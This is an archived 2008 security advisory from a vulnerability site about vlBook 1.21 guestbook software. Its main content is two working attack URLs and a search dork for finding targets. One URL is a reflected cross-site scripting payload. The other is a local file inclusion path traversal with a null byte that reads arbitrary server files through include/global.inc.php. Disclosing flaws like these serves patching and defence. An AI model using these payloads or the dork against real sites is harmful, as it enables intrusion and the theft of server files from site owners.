Computer Security

Security Advisory: vlBook 1.21 (ALL VERSION)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Zomplog 3.8.2 XSS Vulnerability

  chicomas.2.0.4

  project alumni v1.0.9 (info.php) SQL Injection Vulnerability

  Lifetype 1.2.7 XSS Vulnerability

From:irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date:02.05.2008
Subject:vlBook 1.21 (ALL VERSION)

----------------------------------------------------------------
Script : vlBook 1.21 (ALL VERSION)
Type : Multiple Remote Vulnerabilities (LFI/XSS)
----------------------------------------------------------------
Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)
----------------------------------------------------------------
Our Site : Http://IRCRASH.COM
----------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------
Script Download : http://home.vlab.info/vlbook_1.21.zip
----------------------------------------------------------------
DORK : "Powered by  vlBook 1.21"
----------------------------------------------------------------
#XSS Address : http://example/?l=" <script>alert('xss')</script>
----------------------------------------------------------------
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
----------------------------------------------------------------
TNx : God......
----------------------------------------------------------------
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru